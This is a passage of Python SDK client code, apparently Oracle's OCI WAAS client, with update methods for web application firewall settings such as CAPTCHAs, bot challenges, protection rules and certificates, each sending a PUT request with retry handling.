        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.list[Captcha] captchas: (required)
        A list of CAPTCHA details.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.

    :param str opc_retry_token: (optional)
        Token that uniquely identifies a request so it can be retried safely
        after a timeout or server error. Tokens expire after 24 hours.

    :param str if_match: (optional)
        Etag for optimistic concurrency control; the update only proceeds if
        it matches the resource's current etag.

    :param obj retry_strategy: (optional)
        Retry strategy for this call, overriding the client-level strategy.
        Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are allowed in response strings.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_captchas.py.html>`__ to see an example of how to use update_captchas API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/captchas"
    method = "PUT"

    # Reject any keyword argument this operation does not understand.
    accepted = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in accepted]
    if unexpected:
        raise ValueError(
            "update_captchas got unknown kwargs: {!r}".format(unexpected))

    # Path parameters must be present and non-blank.
    path_params = {}
    if waas_policy_id is not missing:
        path_params["waasPolicyId"] = waas_policy_id
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only forward headers the caller actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for header_name, kwarg_name in (("opc-request-id", "opc_request_id"),
                                    ("opc-retry-token", "opc_retry_token"),
                                    ("if-match", "if_match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=captchas)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_certificate(self, certificate_id, **kwargs):
    """
    Updates the display name, freeform tags, and defined tags of a
    certificate. It is not possible to update a certificate's other
    properties — only create and delete.

    :param str certificate_id: (required)
        The `OCID`__ of the SSL certificate used in the WAAS policy,
        generated when the certificate is added to the policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.

    :param str if_match: (optional)
        Etag for optimistic concurrency control; the update only proceeds if
        it matches the resource's current etag.

    :param oci.waas.models.UpdateCertificateDetails update_certificate_details: (optional)
        The new display name, freeform tags, and defined tags to apply to a certificate.

    :param obj retry_strategy: (optional)
        Retry strategy for this call, overriding the client-level strategy.
        Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are allowed in response strings.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.Certificate`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_certificate.py.html>`__ to see an example of how to use update_certificate API.
    """
    resource_path = "/certificates/{certificateId}"
    method = "PUT"

    # Reject any keyword argument this operation does not understand.
    accepted = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "if_match",
        "update_certificate_details"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in accepted]
    if unexpected:
        raise ValueError(
            "update_certificate got unknown kwargs: {!r}".format(unexpected))

    # Path parameters must be present and non-blank.
    path_params = {}
    if certificate_id is not missing:
        path_params["certificateId"] = certificate_id
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only forward headers the caller actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for header_name, kwarg_name in (("opc-request-id", "opc_request_id"),
                                    ("if-match", "if_match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=kwargs.get('update_certificate_details'),
        response_type="Certificate")

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_custom_protection_rule(self, custom_protection_rule_id, update_custom_protection_rule_details, **kwargs):
    """
    Updates the configuration of a custom protection rule. Only the fields
    specified in the request body are updated; all other properties remain
    unchanged.

    :param str custom_protection_rule_id: (required)
        The `OCID`__ of the custom protection rule, generated when the rule
        is added to the compartment.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.UpdateCustomProtectionRuleDetails update_custom_protection_rule_details: (required)
        The details of the custom protection rule to update.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.

    :param str opc_retry_token: (optional)
        Token that uniquely identifies a request so it can be retried safely
        after a timeout or server error. Tokens expire after 24 hours.

    :param str if_match: (optional)
        Etag for optimistic concurrency control; the update only proceeds if
        it matches the resource's current etag.

    :param obj retry_strategy: (optional)
        Retry strategy for this call, overriding the client-level strategy.
        Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are allowed in response strings.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.CustomProtectionRule`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_custom_protection_rule.py.html>`__ to see an example of how to use update_custom_protection_rule API.
    """
    resource_path = "/customProtectionRules/{customProtectionRuleId}"
    method = "PUT"

    # Reject any keyword argument this operation does not understand.
    accepted = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in accepted]
    if unexpected:
        raise ValueError(
            "update_custom_protection_rule got unknown kwargs: {!r}".format(unexpected))

    # Path parameters must be present and non-blank.
    path_params = {}
    if custom_protection_rule_id is not missing:
        path_params["customProtectionRuleId"] = custom_protection_rule_id
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only forward headers the caller actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for header_name, kwarg_name in (("opc-request-id", "opc_request_id"),
                                    ("opc-retry-token", "opc_retry_token"),
                                    ("if-match", "if_match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=update_custom_protection_rule_details,
        response_type="CustomProtectionRule")

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_device_fingerprint_challenge(self, waas_policy_id, update_device_fingerprint_challenge_details, **kwargs):
    """
    Updates the Device Fingerprint Challenge (DFC) settings in the Web
    Application Firewall configuration for a policy.

    The DFC generates a hashed signature of both virtual and real browsers
    based on 50+ attributes (OS, screen resolution, fonts, UserAgent, IP
    address, etc., collected via JavaScript listeners) and uses it for
    real-time correlation to identify and block malicious bots. If a
    fingerprint cannot be generated, a block or alert action results;
    actions can be enforced across devices sharing the same fingerprint.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.DeviceFingerprintChallenge update_device_fingerprint_challenge_details: (required)
        The device fingerprint challenge settings to be updated.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.

    :param str opc_retry_token: (optional)
        Token that uniquely identifies a request so it can be retried safely
        after a timeout or server error. Tokens expire after 24 hours.

    :param str if_match: (optional)
        Etag for optimistic concurrency control; the update only proceeds if
        it matches the resource's current etag.

    :param obj retry_strategy: (optional)
        Retry strategy for this call, overriding the client-level strategy.
        Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are allowed in response strings.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_device_fingerprint_challenge.py.html>`__ to see an example of how to use update_device_fingerprint_challenge API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/deviceFingerprintChallenge"
    method = "PUT"

    # Reject any keyword argument this operation does not understand.
    accepted = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in accepted]
    if unexpected:
        raise ValueError(
            "update_device_fingerprint_challenge got unknown kwargs: {!r}".format(unexpected))

    # Path parameters must be present and non-blank.
    path_params = {}
    if waas_policy_id is not missing:
        path_params["waasPolicyId"] = waas_policy_id
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only forward headers the caller actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for header_name, kwarg_name in (("opc-request-id", "opc_request_id"),
                                    ("opc-retry-token", "opc_retry_token"),
                                    ("if-match", "if_match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=update_device_fingerprint_challenge_details)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_good_bots(self, waas_policy_id, good_bots, **kwargs):
    """
    Updates the list of good bots in the Web Application Firewall
    configuration for a policy. Only the fields specified in the request
    body are updated; all other configuration properties remain unchanged.

    Good bots allow you to manage access for bots from known providers, such
    as Google or Baidu. For more information about good bots, see
    `Bot Management`__.

    __ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/botmanagement.htm

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.list[GoodBot] good_bots: (required)

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.

    :param str opc_retry_token: (optional)
        Token that uniquely identifies a request so it can be retried safely
        after a timeout or server error. Tokens expire after 24 hours.

    :param str if_match: (optional)
        Etag for optimistic concurrency control; the update only proceeds if
        it matches the resource's current etag.

    :param obj retry_strategy: (optional)
        Retry strategy for this call, overriding the client-level strategy.
        Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are allowed in response strings.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_good_bots.py.html>`__ to see an example of how to use update_good_bots API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/goodBots"
    method = "PUT"

    # Reject any keyword argument this operation does not understand.
    accepted = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in accepted]
    if unexpected:
        raise ValueError(
            "update_good_bots got unknown kwargs: {!r}".format(unexpected))

    # Path parameters must be present and non-blank.
    path_params = {}
    if waas_policy_id is not missing:
        path_params["waasPolicyId"] = waas_policy_id
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only forward headers the caller actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for header_name, kwarg_name in (("opc-request-id", "opc_request_id"),
                                    ("opc-retry-token", "opc_retry_token"),
                                    ("if-match", "if_match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=good_bots)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_human_interaction_challenge(self, waas_policy_id, update_human_interaction_challenge_details, **kwargs):
    """
    Updates the Human Interaction Challenge (HIC) settings in the Web Application
    Firewall configuration for a WAAS policy. HIC is a countermeasure that allows
    the proxy to check the user's browser for various behaviors that distinguish a
    human presence from a bot.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.HumanInteractionChallenge update_human_interaction_challenge_details: (required)
        The human interaction challenge settings.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when
        contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a
        timeout or server error without re-executing the action. Retry tokens
        expire after 24 hours but may be invalidated earlier by conflicting
        operations.

    :param str if_match: (optional)
        For optimistic concurrency control: the etag from a previous `GET` or
        `POST` response for this resource. The update only proceeds if it matches
        the resource's current etag.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any client-level
        strategy. Use one of the strategies in :py:mod:`~oci.retry`, or
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response
        object. By default they are not allowed.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    target_path = "/waasPolicies/{waasPolicyId}/wafConfig/humanInteractionChallenge"
    http_method = "PUT"

    # Reject keyword arguments this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unknown = [name for name in kwargs if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "update_human_interaction_challenge got unknown kwargs: {!r}".format(unknown))

    # Path templating: the WAAS policy id must be a non-empty, non-whitespace value.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {name: value for name, value in path_params.items() if value is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only send optional headers that were actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for kwarg_name, header_name in (("opc_request_id", "opc-request-id"),
                                    ("opc_retry_token", "opc-retry-token"),
                                    ("if_match", "if-match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=target_path,
        method=http_method,
        path_params=path_params,
        header_params=header_params,
        body=update_human_interaction_challenge_details)

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retry strategy: attach the idempotency token and retry headers.
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_js_challenge(self, waas_policy_id, update_js_challenge_details, **kwargs):
    """
    Updates the JavaScript challenge settings in the Web Application Firewall
    configuration for a WAAS policy. JavaScript Challenge validates that the
    client can accept JavaScript with a binary decision. For more information,
    see `Bot Management`__.

    __ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/botmanagement.htm

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.JsChallenge update_js_challenge_details: (required)
        The JavaScript challenge settings to be updated.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when
        contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a
        timeout or server error without re-executing the action. Retry tokens
        expire after 24 hours but may be invalidated earlier by conflicting
        operations.

    :param str if_match: (optional)
        For optimistic concurrency control: the etag from a previous `GET` or
        `POST` response for this resource. The update only proceeds if it matches
        the resource's current etag.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any client-level
        strategy. Use one of the strategies in :py:mod:`~oci.retry`, or
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response
        object. By default they are not allowed.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    target_path = "/waasPolicies/{waasPolicyId}/wafConfig/jsChallenge"
    http_method = "PUT"

    # Reject keyword arguments this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unknown = [name for name in kwargs if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "update_js_challenge got unknown kwargs: {!r}".format(unknown))

    # Path templating: the WAAS policy id must be a non-empty, non-whitespace value.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {name: value for name, value in path_params.items() if value is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only send optional headers that were actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for kwarg_name, header_name in (("opc_request_id", "opc-request-id"),
                                    ("opc_retry_token", "opc-retry-token"),
                                    ("if_match", "if-match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=target_path,
        method=http_method,
        path_params=path_params,
        header_params=header_params,
        body=update_js_challenge_details)

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retry strategy: attach the idempotency token and retry headers.
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_policy_config(self, waas_policy_id, update_policy_config_details, **kwargs):
    """
    Updates the configuration for a WAAS policy. Only the fields specified in the
    request body will be updated; all other properties will remain unchanged.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.PolicyConfig update_policy_config_details: (required)
        The new configuration to apply to a WAAS policy.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when
        contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a
        timeout or server error without re-executing the action. Retry tokens
        expire after 24 hours but may be invalidated earlier by conflicting
        operations.

    :param str if_match: (optional)
        For optimistic concurrency control: the etag from a previous `GET` or
        `POST` response for this resource. The update only proceeds if it matches
        the resource's current etag.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any client-level
        strategy. Use one of the strategies in :py:mod:`~oci.retry`, or
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response
        object. By default they are not allowed.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    target_path = "/waasPolicies/{waasPolicyId}/policyConfig"
    http_method = "PUT"

    # Reject keyword arguments this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unknown = [name for name in kwargs if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "update_policy_config got unknown kwargs: {!r}".format(unknown))

    # Path templating: the WAAS policy id must be a non-empty, non-whitespace value.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {name: value for name, value in path_params.items() if value is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only send optional headers that were actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for kwarg_name, header_name in (("opc_request_id", "opc-request-id"),
                                    ("opc_retry_token", "opc-retry-token"),
                                    ("if_match", "if-match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=target_path,
        method=http_method,
        path_params=path_params,
        header_params=header_params,
        body=update_policy_config_details)

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retry strategy: attach the idempotency token and retry headers.
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_protection_rules(self, waas_policy_id, protection_rules, **kwargs):
    """
    Updates the action for each specified protection rule. Requests can either be
    allowed, blocked, or trigger an alert if they meet the parameters of an
    applied rule. For more information on protection rules, see
    `WAF Protection Rules`__.

    This operation can update or disable protection rules depending on the
    structure of the request body. Protection rules can be updated by changing
    the properties of the protection rule object with the rule's key specified
    in the key field.

    __ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/wafprotectionrules.htm

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.list[ProtectionRuleAction] protection_rules: (required)

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when
        contacting Oracle about a particular request.

    :param str if_match: (optional)
        For optimistic concurrency control: the etag from a previous `GET` or
        `POST` response for this resource. The update only proceeds if it matches
        the resource's current etag.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any client-level
        strategy. Use one of the strategies in :py:mod:`~oci.retry`, or
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response
        object. By default they are not allowed.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    target_path = "/waasPolicies/{waasPolicyId}/wafConfig/protectionRules"
    http_method = "PUT"

    # Reject keyword arguments this operation does not understand.
    # Note: no opc_retry_token here -- this operation takes no retry token.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "if_match"
    ]
    unknown = [name for name in kwargs if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "update_protection_rules got unknown kwargs: {!r}".format(unknown))

    # Path templating: the WAAS policy id must be a non-empty, non-whitespace value.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {name: value for name, value in path_params.items() if value is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only send optional headers that were actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for kwarg_name, header_name in (("opc_request_id", "opc-request-id"),
                                    ("if_match", "if-match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=target_path,
        method=http_method,
        path_params=path_params,
        header_params=header_params,
        body=protection_rules)

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retry strategy: attach retry headers (no retry token for this op).
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_protection_settings(self, waas_policy_id, update_protection_settings_details, **kwargs):
    """
    Updates the protection settings in the Web Application Firewall configuration
    for a WAAS policy. Protection settings allow you define what action is taken
    when a request is blocked by the Web Application Firewall, such as returning
    a response code or block page. Only the fields specified in the request body
    will be updated; all other fields will remain unchanged.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.ProtectionSettings update_protection_settings_details: (required)
        The details of the protection settings to be updated.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when
        contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a
        timeout or server error without re-executing the action. Retry tokens
        expire after 24 hours but may be invalidated earlier by conflicting
        operations.

    :param str if_match: (optional)
        For optimistic concurrency control: the etag from a previous `GET` or
        `POST` response for this resource. The update only proceeds if it matches
        the resource's current etag.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any client-level
        strategy. Use one of the strategies in :py:mod:`~oci.retry`, or
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response
        object. By default they are not allowed.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    target_path = "/waasPolicies/{waasPolicyId}/wafConfig/protectionSettings"
    http_method = "PUT"

    # Reject keyword arguments this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unknown = [name for name in kwargs if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "update_protection_settings got unknown kwargs: {!r}".format(unknown))

    # Path templating: the WAAS policy id must be a non-empty, non-whitespace value.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {name: value for name, value in path_params.items() if value is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only send optional headers that were actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for kwarg_name, header_name in (("opc_request_id", "opc-request-id"),
                                    ("opc_retry_token", "opc-retry-token"),
                                    ("if_match", "if-match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=target_path,
        method=http_method,
        path_params=path_params,
        header_params=header_params,
        body=update_protection_settings_details)

    if not retry_strategy:
